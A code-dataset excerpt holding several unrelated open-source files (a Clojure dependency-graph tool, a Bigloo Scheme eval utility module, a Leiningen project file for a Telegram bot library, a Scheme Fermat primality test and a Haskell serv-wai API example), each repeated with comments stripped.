(with-open [r (java.io.PushbackReader. (io/reader filename))]
(binding [*read-eval* false]
(loop [forms [] form (read read-params r)]
(if form
(recur (conj forms form) (read read-params r))
forms))))))
(defn get-ns-defs
([filename]
(get-ns-defs {} filename))
([params file]
(get-ns-defs params file (get-namespace-forms file)))
([{include-defs :include-defs :or {include-defs #{'defn 'defmacro}}}
file [[_ ns-name :as ns-dec] & forms :as nsf]]
(if (try (do (require ns-name) true) (catch Exception e false))
(sequence
(comp
(filter (comp include-defs first))
(map (fn [form] (with-meta form {:ns-name ns-name}))))
forms)
'())))
(defn fqsym
"Returns the fully qualified symbol s in namespace ns"
([ns s]
(fqsym (meta (ns-resolve ns s))))
([{ans :ns sym :name :as m}]
(if m
(with-meta (symbol (str ans) (name sym)) m)
nil)))
(defn get-deps
"Return the dependencies of the function or macro
defined by a-def"
[{:keys [ignore] :or {ignore #{}}} a-def]
(let [{ns-name :ns-name :as m} (meta a-def)
syms (filter symbol? (tree-seq seqable? seq a-def))
[deff fq-name & that] (remove nil? (map (partial fqsym ns-name) syms))
]
(assoc m
:depends-on (sequence (comp (filter (comp seq :arglists meta)) (remove (comp ignore namespace)) (remove (into #{} syms))) that)
:fq-name fq-name
:kind (if (= "defmacro" (name deff)) :macro :function))))
(defn as-graph
"Return the given dependencies as a graph"
[deps]
(apply lg/digraph
(mapcat
(fn [{:keys [depends-on fq-name ns-name]}]
(map (fn [d] [fq-name d]) depends-on)) deps)))
(defn project-dependencies
"Returns a dependency graph of functions
found in all namespaces from path"
([path]
(project-dependencies
{:ignore #{"clojure.core"}} path))
([{:keys [ignore] :as params} path]
(->>
(io/file path)
(nsf/find-sources-in-dir)
(mapcat (partial get-ns-defs params))
(map (partial get-deps params)))))
(def default-params
{:graphviz
{:fmt :pdf :alg :dot
:graph {:ratio 0.618}
:node {:shape :record :fontsize 10}}
:ignore #{"clojure.core"}
:include-defs #{'defn 'defmacro}})
(defn view-deps
([]
(view-deps default-params "."))
([{view-opts :graphviz :as params} path]
(-> path
((partial project-dependencies params))
as-graph
((partial apply lio/view) (mapcat identity view-opts)))))
(defn run [{path :path :as params}]
(do
(view-deps (merge default-params params) (str (or path ".")))
(Thread/sleep 1000)
(System/exit 0)))
(comment
(view-deps)
) | null | https://raw.githubusercontent.com/Hendekagon/clique/29859d561e27d4e6b9444798f385a7840a259a52/src/clj/clique/core.clj | clojure | (ns clique.core
"
Function dependency graph generation
"
(:require
[clojure.tools.namespace.find :as nsf]
[clojure.java.io :as io]
[loom [graph :as lg]
[attr :as la]
[io :as lio]]))
(defn get-namespace-forms [filename]
(let [read-params {:eof nil}]
(with-open [r (java.io.PushbackReader. (io/reader filename))]
(binding [*read-eval* false]
(loop [forms [] form (read read-params r)]
(if form
(recur (conj forms form) (read read-params r))
forms))))))
(defn get-ns-defs
([filename]
(get-ns-defs {} filename))
([params file]
(get-ns-defs params file (get-namespace-forms file)))
([{include-defs :include-defs :or {include-defs #{'defn 'defmacro}}}
file [[_ ns-name :as ns-dec] & forms :as nsf]]
(if (try (do (require ns-name) true) (catch Exception e false))
(sequence
(comp
(filter (comp include-defs first))
(map (fn [form] (with-meta form {:ns-name ns-name}))))
forms)
'())))
(defn fqsym
"Returns the fully qualified symbol s in namespace ns"
([ns s]
(fqsym (meta (ns-resolve ns s))))
([{ans :ns sym :name :as m}]
(if m
(with-meta (symbol (str ans) (name sym)) m)
nil)))
(defn get-deps
"Return the dependencies of the function or macro
defined by a-def"
[{:keys [ignore] :or {ignore #{}}} a-def]
(let [{ns-name :ns-name :as m} (meta a-def)
syms (filter symbol? (tree-seq seqable? seq a-def))
[deff fq-name & that] (remove nil? (map (partial fqsym ns-name) syms))
]
(assoc m
:depends-on (sequence (comp (filter (comp seq :arglists meta)) (remove (comp ignore namespace)) (remove (into #{} syms))) that)
:fq-name fq-name
:kind (if (= "defmacro" (name deff)) :macro :function))))
(defn as-graph
"Return the given dependencies as a graph"
[deps]
(apply lg/digraph
(mapcat
(fn [{:keys [depends-on fq-name ns-name]}]
(map (fn [d] [fq-name d]) depends-on)) deps)))
(defn project-dependencies
"Returns a dependency graph of functions
found in all namespaces from path"
([path]
(project-dependencies
{:ignore #{"clojure.core"}} path))
([{:keys [ignore] :as params} path]
(->>
(io/file path)
(nsf/find-sources-in-dir)
(mapcat (partial get-ns-defs params))
(map (partial get-deps params)))))
(def default-params
{:graphviz
{:fmt :pdf :alg :dot
:graph {:ratio 0.618}
:node {:shape :record :fontsize 10}}
:ignore #{"clojure.core"}
:include-defs #{'defn 'defmacro}})
(defn view-deps
([]
(view-deps default-params "."))
([{view-opts :graphviz :as params} path]
(-> path
((partial project-dependencies params))
as-graph
((partial apply lio/view) (mapcat identity view-opts)))))
(defn run [{path :path :as params}]
(do
(view-deps (merge default-params params) (str (or path ".")))
(Thread/sleep 1000)
(System/exit 0)))
(comment
(view-deps)
) | |
fc3a775c9a82203286024b35e0dd665c9e4abedf8f2f96c70e474bc1777138c4 | donaldsonjw/bigloo | evutils.scm | ;*=====================================================================*/
* serrano / prgm / project / bigloo / runtime / Eval / evutils.scm * /
;* ------------------------------------------------------------- */
* Author : * /
* Creation : Fri Jul 30 08:07:53 2010 * /
* Last change : Sat Sep 7 09:28:41 2013 ( serrano ) * /
* Copyright : 2010 - 13 * /
;* ------------------------------------------------------------- */
;* Utility functions for eval */
;*=====================================================================*/
;*---------------------------------------------------------------------*/
;* The module */
;*---------------------------------------------------------------------*/
(module __evutils
(import __type
__error
__bigloo
__tvector
__structure
__tvector
__bexit
__bignum
__os
__param
__object
__thread
__dsssl
__r4_numbers_6_5
__r4_numbers_6_5_fixnum
__r4_numbers_6_5_flonum
__r4_numbers_6_5_flonum_dtoa
__r4_characters_6_6
__r4_equivalence_6_2
__r4_booleans_6_1
__r4_symbols_6_4
__r4_strings_6_7
__r4_pairs_and_lists_6_3
__r4_control_features_6_9
__r4_vectors_6_8
__r4_ports_6_10_1
__r4_output_6_10_3
__evenv
__macro)
(export (parse-formal-ident ::obj ::obj)
(args->list ::obj)
(bindings->list ::obj)))
;*---------------------------------------------------------------------*/
;* parse-formal-ident ... */
;*---------------------------------------------------------------------*/
(define (parse-formal-ident ident loc)
(define (parse-typed-ident ident)
(let* ((str (symbol->string! ident))
(len (string-length str)))
(let loop ((i 0))
(cond
((=fx i len)
(cons ident '()))
((and (char=? (string-ref str i) #\:)
(<fx i (-fx len 1))
(char=? (string-ref str (+fx i 1)) #\:))
(cond
((=fx i (-fx len 2))
(error/source-location "parse-formal-ident"
"Illegal empty identifier type"
ident
loc))
((=fx i 0)
(cons (string->symbol "") ident))
(else
(cons (string->symbol (substring str 0 i))
(string->symbol (substring str (+fx i 2) len))))))
(else
(loop (+fx i 1)))))))
(cond
((dsssl-named-constant? ident)
(cons (gensym 'dsssl) '()))
((and (pair? ident) (symbol? (car ident)))
(cons ident '()))
((not (symbol? ident))
(error/source-location "parse-formal-ident"
"Illegal identifier type"
ident
loc))
(else
(parse-typed-ident ident))))
;*---------------------------------------------------------------------*/
;* args->list ... */
;*---------------------------------------------------------------------*/
(define (args->list args)
(cond
((null? args)
'())
((symbol? args)
(list args))
((pair? args)
(cons (car args) (args->list (cdr args))))
(else
(error/source 'args->list "Illegal args list" args args))))
;*---------------------------------------------------------------------*/
;* bindings->list ... */
;*---------------------------------------------------------------------*/
(define (bindings->list bindings)
(cond
((null? bindings)
'())
((not (pair? bindings))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
((symbol? (car bindings))
(cons bindings (bindings->list (cdr bindings))))
((not (pair? (car bindings)))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
(else
(cons (car bindings) (bindings->list (cdr bindings))))))
| null | https://raw.githubusercontent.com/donaldsonjw/bigloo/a4d06e409d0004e159ce92b9908719510a18aed5/runtime/Eval/evutils.scm | scheme | *=====================================================================*/
* ------------------------------------------------------------- */
* ------------------------------------------------------------- */
* Utility functions for eval */
*=====================================================================*/
*---------------------------------------------------------------------*/
* The module */
*---------------------------------------------------------------------*/
*---------------------------------------------------------------------*/
* parse-formal-ident ... */
*---------------------------------------------------------------------*/
*---------------------------------------------------------------------*/
* args->list ... */
*---------------------------------------------------------------------*/
*---------------------------------------------------------------------*/
* bindings->list ... */
*---------------------------------------------------------------------*/ | * serrano / prgm / project / bigloo / runtime / Eval / evutils.scm * /
* Author : * /
* Creation : Fri Jul 30 08:07:53 2010 * /
* Last change : Sat Sep 7 09:28:41 2013 ( serrano ) * /
* Copyright : 2010 - 13 * /
(module __evutils
(import __type
__error
__bigloo
__tvector
__structure
__tvector
__bexit
__bignum
__os
__param
__object
__thread
__dsssl
__r4_numbers_6_5
__r4_numbers_6_5_fixnum
__r4_numbers_6_5_flonum
__r4_numbers_6_5_flonum_dtoa
__r4_characters_6_6
__r4_equivalence_6_2
__r4_booleans_6_1
__r4_symbols_6_4
__r4_strings_6_7
__r4_pairs_and_lists_6_3
__r4_control_features_6_9
__r4_vectors_6_8
__r4_ports_6_10_1
__r4_output_6_10_3
__evenv
__macro)
(export (parse-formal-ident ::obj ::obj)
(args->list ::obj)
(bindings->list ::obj)))
(define (parse-formal-ident ident loc)
(define (parse-typed-ident ident)
(let* ((str (symbol->string! ident))
(len (string-length str)))
(let loop ((i 0))
(cond
((=fx i len)
(cons ident '()))
((and (char=? (string-ref str i) #\:)
(<fx i (-fx len 1))
(char=? (string-ref str (+fx i 1)) #\:))
(cond
((=fx i (-fx len 2))
(error/source-location "parse-formal-ident"
"Illegal empty identifier type"
ident
loc))
((=fx i 0)
(cons (string->symbol "") ident))
(else
(cons (string->symbol (substring str 0 i))
(string->symbol (substring str (+fx i 2) len))))))
(else
(loop (+fx i 1)))))))
(cond
((dsssl-named-constant? ident)
(cons (gensym 'dsssl) '()))
((and (pair? ident) (symbol? (car ident)))
(cons ident '()))
((not (symbol? ident))
(error/source-location "parse-formal-ident"
"Illegal identifier type"
ident
loc))
(else
(parse-typed-ident ident))))
(define (args->list args)
(cond
((null? args)
'())
((symbol? args)
(list args))
((pair? args)
(cons (car args) (args->list (cdr args))))
(else
(error/source 'args->list "Illegal args list" args args))))
(define (bindings->list bindings)
(cond
((null? bindings)
'())
((not (pair? bindings))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
((symbol? (car bindings))
(cons bindings (bindings->list (cdr bindings))))
((not (pair? (car bindings)))
(error/source 'bindings->list "Illegal bindings list" bindings bindings))
(else
(cons (car bindings) (bindings->list (cdr bindings))))))
|
e606b6c20496b5bda45eeab8ebfd62fe55b7f68d58e3d5eaa47b1b78f86e1b41 | wdhowe/telegrambot-lib | project.clj | (defproject telegrambot-lib "2.5.0"
:description "A library for interacting with the Telegram Bot API."
:url "-lib"
:license {:name "EPL-2.0 OR GPL-2.0-or-later WITH Classpath-exception-2.0"
:url "-2.0/"}
:dependencies [[clj-http "3.12.3"]
[environ "1.2.0"]
[org.clojure/clojure "1.11.1"]
[org.clojure/core.async "1.6.673"]
[org.clojure/tools.logging "1.2.4"]
[potemkin "0.4.6"]]
:repl-options {:init-ns telegrambot-lib.core}
:profiles {:dev [:project/dev :profiles/dev]
:test [:project/test :profiles/test]
;; only edit :profiles/* in profiles.clj
:profiles/dev {}
:profiles/test {}
:project/dev {:dependencies [;; logback-classic must be 1.3.x due to jdk8 support.
;; See: -lib/pull/120/commits/015d31621a3fd5a7f69dcf7c230d76d55f7a47c1
[ch.qos.logback/logback-classic "1.3.5" :upgrade :logback]
[clj-http-fake "1.0.3"]]
:plugins [[lein-environ "1.2.0"]]
:source-paths ["env/dev/clj"]
:resource-paths ["env/dev/resources"]}
:project/test {:plugins [[lein-environ "1.2.0"]]
:resource-paths ["env/test/resources"]}
:cheshire [:test {:dependencies [[cheshire "5.11.0"]]}]
:jsonista [:test {:dependencies [[metosin/jsonista "0.3.7"]]}]
:data.json [:test {:dependencies [[org.clojure/data.json "2.4.0"]]}]}
:test-selectors {:default (complement :json)
:json :json})
| null | https://raw.githubusercontent.com/wdhowe/telegrambot-lib/1ec60bd8fa6d83a9057933a4d04254cbe0b6d4d6/project.clj | clojure | only edit :profiles/* in profiles.clj
logback-classic must be 1.3.x due to jdk8 support.
See: -lib/pull/120/commits/015d31621a3fd5a7f69dcf7c230d76d55f7a47c1 | (defproject telegrambot-lib "2.5.0"
:description "A library for interacting with the Telegram Bot API."
:url "-lib"
:license {:name "EPL-2.0 OR GPL-2.0-or-later WITH Classpath-exception-2.0"
:url "-2.0/"}
:dependencies [[clj-http "3.12.3"]
[environ "1.2.0"]
[org.clojure/clojure "1.11.1"]
[org.clojure/core.async "1.6.673"]
[org.clojure/tools.logging "1.2.4"]
[potemkin "0.4.6"]]
:repl-options {:init-ns telegrambot-lib.core}
:profiles {:dev [:project/dev :profiles/dev]
:test [:project/test :profiles/test]
:profiles/dev {}
:profiles/test {}
[ch.qos.logback/logback-classic "1.3.5" :upgrade :logback]
[clj-http-fake "1.0.3"]]
:plugins [[lein-environ "1.2.0"]]
:source-paths ["env/dev/clj"]
:resource-paths ["env/dev/resources"]}
:project/test {:plugins [[lein-environ "1.2.0"]]
:resource-paths ["env/test/resources"]}
:cheshire [:test {:dependencies [[cheshire "5.11.0"]]}]
:jsonista [:test {:dependencies [[metosin/jsonista "0.3.7"]]}]
:data.json [:test {:dependencies [[org.clojure/data.json "2.4.0"]]}]}
:test-selectors {:default (complement :json)
:json :json})
|
698ccc33a8deef6cde0d045eb0d5e8f6e2cc56704df0f8ec1cbf8594db83e983 | acieroid/scala-am | fermat.scm | Fermat and Solovay - Strassen primality testing in Scheme .
Author :
;; Site: /
Mathematical support .
square(x ) = x^2
(define (square x) (* x x))
; modulo-power: a fast modular exponentiation routine.
; modulo-power(base,exp,n) = base^exp [mod n]
(define (modulo-power base exp n)
(if (= exp 0)
1
(if (odd? exp)
(modulo (* base (modulo-power base (- exp 1) n)) n)
(modulo (square (modulo-power base (/ exp 2) n)) n))))
;; Random number utilities.
;(define (random-char)
; (call-with-input-file "/dev/random"
; (lambda (port)
; (read-char port))))
;(define (random-num)
; (let ((n (char->integer (random-char))))
( if (= n 65533 )
; (random-num)
; n)))
( define ( random - bit ) ( modulo ( random - num ) 2 ) )
( define ( random - byte ) ( + ( modulo ( random - num ) ; 128 ) ( * 128 ( random - bit ) ) ) )
;(define (random bytes)
( if ( < = bytes 0 )
; 0
( + ( * 256 ( random ( - bytes 1 ) ) ) ( random - byte ) ) ) )
Primality tests .
is - trivial - composite ? : divisibility tests with the first few primes .
(define (is-trivial-composite? n)
(or (= (modulo n 2) 0)
(= (modulo n 3) 0)
(= (modulo n 5) 0)
(= (modulo n 7) 0)
(= (modulo n 11) 0)
(= (modulo n 13) 0)
(= (modulo n 17) 0)
(= (modulo n 19) 0)
(= (modulo n 23) 0)))
; is-fermat-prime?:
; Check, for many values of a:
a^(n-1 ) = 1 [ mod n ] ?
; If yes, could be prime.
; If no, then composite.
Warning : Some numbers ( though rare ) defeat this test .
(define (is-fermat-prime? n iterations)
(or (<= iterations 0)
(let* ((byte-size (ceiling (/ (log n) (log 2))))
(a (random byte-size)))
(if (= (modulo-power a (- n 1) n) 1)
(is-fermat-prime? n (- iterations 1))
#f))))
;; Prime generation.
generate - fermat - prime(byte - size ) yields a prime satisfying the Fermat test .
(define (generate-fermat-prime byte-size iterations)
(let ((n (random byte-size)))
(if
(and (not (is-trivial-composite? n)) (is-fermat-prime? n iterations))
n
(generate-fermat-prime byte-size iterations))))
;; Example
(define iterations 10)
(define byte-size 15)
(display "Generating prime...")
(newline)
(display (generate-fermat-prime byte-size iterations))
(display " is prime with at least probability 1 - 1/2^")
(display iterations)
(newline)
(display " if it is not a Carmichael number.")
(newline)
| null | https://raw.githubusercontent.com/acieroid/scala-am/13ef3befbfc664b77f31f56847c30d60f4ee7dfe/test/R5RS/WeiChenRompf2019/fermat.scm | scheme | Site: /
modulo-power: a fast modular exponentiation routine.
modulo-power(base,exp,n) = base^exp [mod n]
Random number utilities.
(define (random-char)
(call-with-input-file "/dev/random"
(lambda (port)
(read-char port))))
(define (random-num)
(let ((n (char->integer (random-char))))
(random-num)
n)))
128 ) ( * 128 ( random - bit ) ) ) )
(define (random bytes)
0
is-fermat-prime?:
Check, for many values of a:
If yes, could be prime.
If no, then composite.
Prime generation.
Example | Fermat and Solovay - Strassen primality testing in Scheme .
Author :
Mathematical support .
square(x ) = x^2
(define (square x) (* x x))
(define (modulo-power base exp n)
(if (= exp 0)
1
(if (odd? exp)
(modulo (* base (modulo-power base (- exp 1) n)) n)
(modulo (square (modulo-power base (/ exp 2) n)) n))))
( if (= n 65533 )
( define ( random - bit ) ( modulo ( random - num ) 2 ) )
( if ( < = bytes 0 )
( + ( * 256 ( random ( - bytes 1 ) ) ) ( random - byte ) ) ) )
Primality tests .
is - trivial - composite ? : divisibility tests with the first few primes .
(define (is-trivial-composite? n)
(or (= (modulo n 2) 0)
(= (modulo n 3) 0)
(= (modulo n 5) 0)
(= (modulo n 7) 0)
(= (modulo n 11) 0)
(= (modulo n 13) 0)
(= (modulo n 17) 0)
(= (modulo n 19) 0)
(= (modulo n 23) 0)))
a^(n-1 ) = 1 [ mod n ] ?
Warning : Some numbers ( though rare ) defeat this test .
(define (is-fermat-prime? n iterations)
(or (<= iterations 0)
(let* ((byte-size (ceiling (/ (log n) (log 2))))
(a (random byte-size)))
(if (= (modulo-power a (- n 1) n) 1)
(is-fermat-prime? n (- iterations 1))
#f))))
generate - fermat - prime(byte - size ) yields a prime satisfying the Fermat test .
(define (generate-fermat-prime byte-size iterations)
(let ((n (random byte-size)))
(if
(and (not (is-trivial-composite? n)) (is-fermat-prime? n iterations))
n
(generate-fermat-prime byte-size iterations))))
(define iterations 10)
(define byte-size 15)
(display "Generating prime...")
(newline)
(display (generate-fermat-prime byte-size iterations))
(display " is prime with at least probability 1 - 1/2^")
(display iterations)
(newline)
(display " if it is not a Carmichael number.")
(newline)
|
141e6b8cf34d60bad65ae427b7babcbc36a76aae17a4d73e451460c55aba3f0b | tel/serv | Ex1.hs | # LANGUAGE DataKinds #
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE TypeOperators #-}
import Data.Aeson (Value (..))
import Data.Maybe (fromMaybe)
import Data.Text (Text)
import Network.Wai.Handler.Warp (run)
import Serv.Api.Prelude
import Serv.Wai.Prelude
type RawBody = HasBody '[TextPlain] Text
type JSONBody = HasBody '[JSON] Value
type TheApi
= Endpoint ()
'[ GET ::: Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] RawBody
]
, PUT ::: CaptureBody '[JSON] (Maybe Value) (Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] JSONBody
])
, DELETE ::: Outputs
'[ InternalServerError :::
Respond '[] RawBody
]
]
apiSing :: Sing TheApi
apiSing = sing
impl :: Impl IO TheApi
impl = get <+> put <+> delete where
get =
SGET =:
(return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody "Hello")
put =
SPUT =:
(\body -> return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody (fromMaybe (String "no body passed") body))
delete =
SDELETE =:
(return . respond
$ emptyResponse SInternalServerError
& withBody "Server error")
theServer :: Server IO
theServer = server apiSing impl
main :: IO ()
main = run 3000 (serverApplication theServer)
| null | https://raw.githubusercontent.com/tel/serv/7967761d6c47f13f0edd567f8af9b1c7dc8b9a23/serv-wai/exe/Ex1.hs | haskell | # LANGUAGE OverloadedStrings #
# LANGUAGE TypeOperators # | # LANGUAGE DataKinds #
import Data.Aeson (Value (..))
import Data.Maybe (fromMaybe)
import Data.Text (Text)
import Network.Wai.Handler.Warp (run)
import Serv.Api.Prelude
import Serv.Wai.Prelude
type RawBody = HasBody '[TextPlain] Text
type JSONBody = HasBody '[JSON] Value
type TheApi
= Endpoint ()
'[ GET ::: Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] RawBody
]
, PUT ::: CaptureBody '[JSON] (Maybe Value) (Outputs
'[ Ok :::
Respond '[ CacheControl ::: Raw Text ] JSONBody
])
, DELETE ::: Outputs
'[ InternalServerError :::
Respond '[] RawBody
]
]
apiSing :: Sing TheApi
apiSing = sing
impl :: Impl IO TheApi
impl = get <+> put <+> delete where
get =
SGET =:
(return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody "Hello")
put =
SPUT =:
(\body -> return . respond
$ emptyResponse SOk
& withHeader SCacheControl "foo"
& withBody (fromMaybe (String "no body passed") body))
delete =
SDELETE =:
(return . respond
$ emptyResponse SInternalServerError
& withBody "Server error")
theServer :: Server IO
theServer = server apiSing impl
main :: IO ()
main = run 3000 (serverApplication theServer)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.